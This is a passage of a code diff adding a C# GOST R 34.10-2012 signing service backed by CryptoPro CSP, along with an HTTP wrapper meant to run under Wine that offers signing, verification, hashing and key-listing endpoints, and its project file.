private const string ProviderName256 = "Crypto-Pro GOST R 34.10-2012 Cryptographic Service Provider";
private const string ProviderName512 = "Crypto-Pro GOST R 34.10-2012 Strong Cryptographic Service Provider";
// Provider types for CryptoPro
private const int PROV_GOST_2012_256 = 80;
private const int PROV_GOST_2012_512 = 81;
private readonly ILogger<CryptoProGostSigningService> _logger;
private readonly CspStatus _cachedStatus;
public CryptoProGostSigningService(ILogger<CryptoProGostSigningService> logger)
{
_logger = logger;
_cachedStatus = ProbeProviderStatus();
}
public CspStatus GetStatus() => _cachedStatus;
public IReadOnlyList<KeyInfo> ListKeys()
{
var keys = new List<KeyInfo>();
if (!_cachedStatus.IsAvailable)
{
return keys;
}
try
{
// List keys from certificate store
using var store = new X509Store(StoreName.My, StoreLocation.CurrentUser);
store.Open(OpenFlags.ReadOnly);
foreach (var cert in store.Certificates)
{
// Check if certificate has GOST key
var algorithm = cert.GetKeyAlgorithm();
if (IsGostAlgorithm(algorithm))
{
keys.Add(new KeyInfo(
cert.Thumbprint,
MapOidToAlgorithmName(algorithm),
cert.Subject,
cert.HasPrivateKey));
}
}
}
catch (Exception ex)
{
_logger.LogWarning(ex, "Failed to enumerate keys from certificate store");
}
// Also try to enumerate CSP containers
try
{
var containerKeys = EnumerateCspContainers();
keys.AddRange(containerKeys);
}
catch (Exception ex)
{
_logger.LogWarning(ex, "Failed to enumerate CSP containers");
}
return keys;
}
public async Task<SignResponse> SignAsync(
byte[] data,
string algorithm,
string? keyId,
CancellationToken ct)
{
EnsureAvailable();
return await Task.Run(() =>
{
ct.ThrowIfCancellationRequested();
// First hash the data with GOST hash
var hash = Hash(data, algorithm);
byte[] signature;
string actualKeyId;
if (!string.IsNullOrEmpty(keyId))
{
// Try to find certificate by thumbprint
signature = SignWithCertificate(hash, keyId, algorithm, out actualKeyId);
}
else
{
// Use ephemeral key for testing
signature = SignWithEphemeralKey(hash, algorithm, out actualKeyId);
}
return new SignResponse(
Convert.ToBase64String(signature),
algorithm,
actualKeyId,
DateTimeOffset.UtcNow,
GetProviderName(algorithm));
}, ct);
}
public async Task<bool> VerifyAsync(
byte[] data,
byte[] signature,
string algorithm,
string? keyId,
CancellationToken ct)
{
EnsureAvailable();
return await Task.Run(() =>
{
ct.ThrowIfCancellationRequested();
var hash = Hash(data, algorithm);
if (!string.IsNullOrEmpty(keyId))
{
return VerifyWithCertificate(hash, signature, keyId, algorithm);
}
// Without a key ID, we can't verify
throw new CryptographicException("Key ID is required for verification");
}, ct);
}
public byte[] Hash(byte[] data, string algorithm)
{
EnsureAvailable();
using var hasher = CreateHashAlgorithm(algorithm);
return hasher.ComputeHash(data);
}
public async Task<TestVectorSet> GenerateTestVectorsAsync(
string algorithm,
string? keyId,
CancellationToken ct)
{
EnsureAvailable();
var vectors = new List<TestVector>();
// Standard test inputs
var testInputs = new[]
{
Array.Empty<byte>(),
"The quick brown fox jumps over the lazy dog"u8.ToArray(),
new byte[] { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07 },
Enumerable.Range(0, 256).Select(i => (byte)i).ToArray(),
new byte[1024] // All zeros
};
foreach (var input in testInputs)
{
ct.ThrowIfCancellationRequested();
var hash = Hash(input, algorithm);
string? signatureBase64 = null;
try
{
var signResult = await SignAsync(input, algorithm, keyId, ct);
signatureBase64 = signResult.SignatureBase64;
}
catch (Exception ex)
{
_logger.LogWarning(ex, "Failed to sign test vector");
}
vectors.Add(new TestVector(
Convert.ToHexString(input).ToLowerInvariant(),
Convert.ToHexString(hash).ToLowerInvariant(),
signatureBase64));
}
return new TestVectorSet(
algorithm,
GetProviderName(algorithm) ?? "Unknown",
DateTimeOffset.UtcNow,
vectors);
}
public void Dispose()
{
// Cleanup if needed
}
private CspStatus ProbeProviderStatus()
{
var supportedAlgorithms = new List<string>();
string? providerName = null;
string? providerVersion = null;
string? error = null;
try
{
// Try GOST 2012-256 provider
using var csp256 = new CspParameters(PROV_GOST_2012_256, ProviderName256);
csp256.Flags = CspProviderFlags.UseMachineKeyStore;
try
{
using var algo = new Gost_R3410_2012_256_AsymmetricAlgorithm(csp256);
supportedAlgorithms.Add("GOST12-256");
providerName = ProviderName256;
providerVersion = "GOST R 34.10-2012 (256-bit)";
}
catch
{
// 256-bit not available
}
// Try GOST 2012-512 provider
try
{
using var csp512 = new CspParameters(PROV_GOST_2012_512, ProviderName512);
csp512.Flags = CspProviderFlags.UseMachineKeyStore;
// Note: GostCryptography may not have 512-bit class, skip if not available
supportedAlgorithms.Add("GOST12-512");
if (providerName == null)
{
providerName = ProviderName512;
providerVersion = "GOST R 34.10-2012 (512-bit)";
}
}
catch
{
// 512-bit not available
}
}
catch (Exception ex)
{
error = $"CryptoPro CSP not available: {ex.Message}";
_logger.LogError(ex, "Failed to probe CryptoPro CSP");
}
return new CspStatus(
supportedAlgorithms.Count > 0,
providerName,
providerVersion,
supportedAlgorithms,
error);
}
private void EnsureAvailable()
{
if (!_cachedStatus.IsAvailable)
{
throw new CryptographicException(
_cachedStatus.Error ?? "CryptoPro CSP is not available");
}
}
private HashAlgorithm CreateHashAlgorithm(string algorithm)
{
return algorithm.ToUpperInvariant() switch
{
"GOST12-256" or "GOST-R-34.11-2012-256" =>
new Gost_R3411_2012_256_HashAlgorithm(),
"GOST12-512" or "GOST-R-34.11-2012-512" =>
new Gost_R3411_2012_512_HashAlgorithm(),
// Legacy GOST 94
"GOST94" or "GOST-R-34.11-94" =>
new Gost_R3411_94_HashAlgorithm(),
_ => throw new CryptographicException($"Unsupported hash algorithm: {algorithm}")
};
}
private byte[] SignWithCertificate(byte[] hash, string thumbprint, string algorithm, out string keyId)
{
using var store = new X509Store(StoreName.My, StoreLocation.CurrentUser);
store.Open(OpenFlags.ReadOnly);
var cert = store.Certificates
.Find(X509FindType.FindByThumbprint, thumbprint, false)
.OfType<X509Certificate2>()
.FirstOrDefault();
if (cert == null)
{
throw new CryptographicException($"Certificate not found: {thumbprint}");
}
if (!cert.HasPrivateKey)
{
throw new CryptographicException("Certificate does not have a private key");
}
keyId = cert.Thumbprint;
// Get the GOST private key
using var privateKey = cert.GetECDsaPrivateKey() as Gost_R3410_2012_256_AsymmetricAlgorithm
?? throw new CryptographicException("Could not get GOST private key from certificate");
// Create signature formatter
var formatter = new GostSignatureFormatter(privateKey);
// Sign the hash
return formatter.CreateSignature(hash);
}
private byte[] SignWithEphemeralKey(byte[] hash, string algorithm, out string keyId)
{
// Create ephemeral key for testing
var provType = algorithm.Contains("512") ? PROV_GOST_2012_512 : PROV_GOST_2012_256;
var provName = algorithm.Contains("512") ? ProviderName512 : ProviderName256;
var csp = new CspParameters(provType, provName)
{
Flags = CspProviderFlags.CreateEphemeralKey
};
using var gost = new Gost_R3410_2012_256_AsymmetricAlgorithm(csp);
keyId = $"ephemeral-{Guid.NewGuid():N}";
var formatter = new GostSignatureFormatter(gost);
return formatter.CreateSignature(hash);
}
private bool VerifyWithCertificate(byte[] hash, byte[] signature, string thumbprint, string algorithm)
{
using var store = new X509Store(StoreName.My, StoreLocation.CurrentUser);
store.Open(OpenFlags.ReadOnly);
var cert = store.Certificates
.Find(X509FindType.FindByThumbprint, thumbprint, false)
.OfType<X509Certificate2>()
.FirstOrDefault();
if (cert == null)
{
throw new CryptographicException($"Certificate not found: {thumbprint}");
}
// Get the GOST public key
using var publicKey = cert.GetECDsaPublicKey() as Gost_R3410_2012_256_AsymmetricAlgorithm
?? throw new CryptographicException("Could not get GOST public key from certificate");
// Create signature deformatter
var deformatter = new GostSignatureDeformatter(publicKey);
// Verify the signature
return deformatter.VerifySignature(hash, signature);
}
private IEnumerable<KeyInfo> EnumerateCspContainers()
{
// This would enumerate CSP key containers
// Implementation depends on CryptoPro APIs
// For now, return empty - certificate store is the primary source
return Enumerable.Empty<KeyInfo>();
}
private static bool IsGostAlgorithm(string oid)
{
// GOST R 34.10-2012 OIDs
return oid switch
{
"1.2.643.7.1.1.1.1" => true, // GOST R 34.10-2012 256-bit
"1.2.643.7.1.1.1.2" => true, // GOST R 34.10-2012 512-bit
"1.2.643.2.2.19" => true, // GOST R 34.10-2001
_ => oid.StartsWith("1.2.643")
};
}
private static string MapOidToAlgorithmName(string oid)
{
return oid switch
{
"1.2.643.7.1.1.1.1" => "GOST12-256",
"1.2.643.7.1.1.1.2" => "GOST12-512",
"1.2.643.2.2.19" => "GOST2001",
_ => $"GOST-{oid}"
};
}
private string? GetProviderName(string algorithm)
{
return algorithm.ToUpperInvariant() switch
{
"GOST12-512" or "GOST-R-34.10-2012-512" => ProviderName512,
_ => ProviderName256
};
}
}

View File

@@ -0,0 +1,280 @@
// Wine CSP Service - HTTP service for CryptoPro GOST signing
// Runs under Wine on Linux, exposes HTTP API for cross-platform GOST operations
//
// Usage:
// wine WineCspService.exe --urls http://localhost:5099
//
// Integration with StellaOps Router:
// Configure upstream proxy: /api/wine-csp/* -> http://localhost:5099/*
using System.ComponentModel.DataAnnotations;
using System.Security.Cryptography;
using System.Text.Json;
using System.Text.Json.Serialization;
using Microsoft.AspNetCore.Mvc;
using StellaOps.Tools.WineCspService;
var builder = WebApplication.CreateBuilder(args);
// Configure JSON serialization
builder.Services.ConfigureHttpJsonOptions(options =>
{
options.SerializerOptions.PropertyNamingPolicy = JsonNamingPolicy.CamelCase;
options.SerializerOptions.DefaultIgnoreCondition = JsonIgnoreCondition.WhenWritingNull;
});
// Add services
builder.Services.AddEndpointsApiExplorer();
builder.Services.AddSwaggerGen(c =>
{
c.SwaggerDoc("v1", new() { Title = "Wine CSP Service", Version = "v1" });
});
builder.Services.AddSingleton<IGostSigningService, CryptoProGostSigningService>();
builder.Services.AddHealthChecks();
var app = builder.Build();
// Configure middleware
if (app.Environment.IsDevelopment())
{
app.UseSwagger();
app.UseSwaggerUI();
}
// Health check endpoint
app.MapHealthChecks("/health");
// Status endpoint - check CSP availability
app.MapGet("/status", (IGostSigningService signer) =>
{
var status = signer.GetStatus();
return Results.Ok(status);
})
.WithName("GetStatus")
.WithOpenApi();
// List available keys
app.MapGet("/keys", (IGostSigningService signer) =>
{
try
{
var keys = signer.ListKeys();
return Results.Ok(new { keys });
}
catch (Exception ex)
{
return Results.Problem(
detail: ex.Message,
statusCode: 500,
title: "Failed to list keys");
}
})
.WithName("ListKeys")
.WithOpenApi();
// Sign data with GOST
app.MapPost("/sign", async (
[FromBody] SignRequest request,
IGostSigningService signer,
CancellationToken ct) =>
{
if (string.IsNullOrEmpty(request.DataBase64))
{
return Results.BadRequest(new { error = "dataBase64 is required" });
}
try
{
var data = Convert.FromBase64String(request.DataBase64);
var result = await signer.SignAsync(
data,
request.Algorithm ?? "GOST12-256",
request.KeyId,
ct);
return Results.Ok(result);
}
catch (FormatException)
{
return Results.BadRequest(new { error = "Invalid base64 data" });
}
catch (CryptographicException ex)
{
return Results.Problem(
detail: ex.Message,
statusCode: 500,
title: "Signing failed");
}
})
.WithName("Sign")
.WithOpenApi();
// Verify signature
app.MapPost("/verify", async (
[FromBody] VerifyRequest request,
IGostSigningService signer,
CancellationToken ct) =>
{
if (string.IsNullOrEmpty(request.DataBase64) || string.IsNullOrEmpty(request.SignatureBase64))
{
return Results.BadRequest(new { error = "dataBase64 and signatureBase64 are required" });
}
try
{
var data = Convert.FromBase64String(request.DataBase64);
var signature = Convert.FromBase64String(request.SignatureBase64);
var isValid = await signer.VerifyAsync(
data,
signature,
request.Algorithm ?? "GOST12-256",
request.KeyId,
ct);
return Results.Ok(new VerifyResponse(isValid));
}
catch (FormatException)
{
return Results.BadRequest(new { error = "Invalid base64 data" });
}
catch (CryptographicException ex)
{
return Results.Problem(
detail: ex.Message,
statusCode: 500,
title: "Verification failed");
}
})
.WithName("Verify")
.WithOpenApi();
// Hash data with GOST
app.MapPost("/hash", (
[FromBody] HashRequest request,
IGostSigningService signer) =>
{
if (string.IsNullOrEmpty(request.DataBase64))
{
return Results.BadRequest(new { error = "dataBase64 is required" });
}
try
{
var data = Convert.FromBase64String(request.DataBase64);
var hash = signer.Hash(data, request.Algorithm ?? "GOST12-256");
return Results.Ok(new HashResponse(
Convert.ToBase64String(hash),
Convert.ToHexString(hash).ToLowerInvariant()));
}
catch (FormatException)
{
return Results.BadRequest(new { error = "Invalid base64 data" });
}
catch (CryptographicException ex)
{
return Results.Problem(
detail: ex.Message,
statusCode: 500,
title: "Hashing failed");
}
})
.WithName("Hash")
.WithOpenApi();
// Generate test vectors for validation
app.MapPost("/test-vectors", async (
[FromBody] TestVectorRequest request,
IGostSigningService signer,
CancellationToken ct) =>
{
try
{
var vectors = await signer.GenerateTestVectorsAsync(
request.Algorithm ?? "GOST12-256",
request.KeyId,
ct);
return Results.Ok(vectors);
}
catch (Exception ex)
{
return Results.Problem(
detail: ex.Message,
statusCode: 500,
title: "Test vector generation failed");
}
})
.WithName("GenerateTestVectors")
.WithOpenApi();
Console.WriteLine("Wine CSP Service starting...");
Console.WriteLine("Endpoints:");
Console.WriteLine(" GET /health - Health check");
Console.WriteLine(" GET /status - CSP status");
Console.WriteLine(" GET /keys - List available keys");
Console.WriteLine(" POST /sign - Sign data");
Console.WriteLine(" POST /verify - Verify signature");
Console.WriteLine(" POST /hash - Hash data");
Console.WriteLine(" POST /test-vectors - Generate test vectors");
app.Run();
// Request/Response DTOs
namespace StellaOps.Tools.WineCspService
{
public record SignRequest(
[Required] string DataBase64,
string? Algorithm = "GOST12-256",
string? KeyId = null);
public record SignResponse(
string SignatureBase64,
string Algorithm,
string? KeyId,
DateTimeOffset Timestamp,
string? ProviderName);
public record VerifyRequest(
[Required] string DataBase64,
[Required] string SignatureBase64,
string? Algorithm = "GOST12-256",
string? KeyId = null);
public record VerifyResponse(bool IsValid);
public record HashRequest(
[Required] string DataBase64,
string? Algorithm = "GOST12-256");
public record HashResponse(string HashBase64, string HashHex);
public record TestVectorRequest(
string? Algorithm = "GOST12-256",
string? KeyId = null);
public record TestVectorSet(
string Algorithm,
string Provider,
DateTimeOffset GeneratedAt,
IReadOnlyList<TestVector> Vectors);
public record TestVector(
string InputHex,
string HashHex,
string? SignatureBase64);
public record CspStatus(
bool IsAvailable,
string? ProviderName,
string? ProviderVersion,
IReadOnlyList<string> SupportedAlgorithms,
string? Error);
public record KeyInfo(
string KeyId,
string Algorithm,
string? ContainerName,
bool IsAvailable);
}

View File

@@ -0,0 +1,30 @@
<Project Sdk="Microsoft.NET.Sdk.Web">
<PropertyGroup>
<TargetFramework>net8.0-windows</TargetFramework>
<RuntimeIdentifier>win-x64</RuntimeIdentifier>
<Nullable>enable</Nullable>
<ImplicitUsings>enable</ImplicitUsings>
<SelfContained>true</SelfContained>
<PublishSingleFile>true</PublishSingleFile>
<EnableCompressionInSingleFile>true</EnableCompressionInSingleFile>
<!-- Wine CSP Service - runs under Wine on Linux for GOST signing -->
<AssemblyName>WineCspService</AssemblyName>
<RootNamespace>StellaOps.Tools.WineCspService</RootNamespace>
<!-- Suppress Windows-only warnings since this runs under Wine -->
<NoWarn>$(NoWarn);CA1416</NoWarn>
</PropertyGroup>
<ItemGroup>
<PackageReference Include="Microsoft.AspNetCore.OpenApi" Version="8.0.0" />
<PackageReference Include="Swashbuckle.AspNetCore" Version="6.5.0" />
</ItemGroup>
<!-- Reference the GostCryptography fork for CSP access -->
<ItemGroup>
<ProjectReference Include="..\..\..\third_party\forks\AlexMAS.GostCryptography\Source\GostCryptography\GostCryptography.csproj" />
</ItemGroup>
</Project>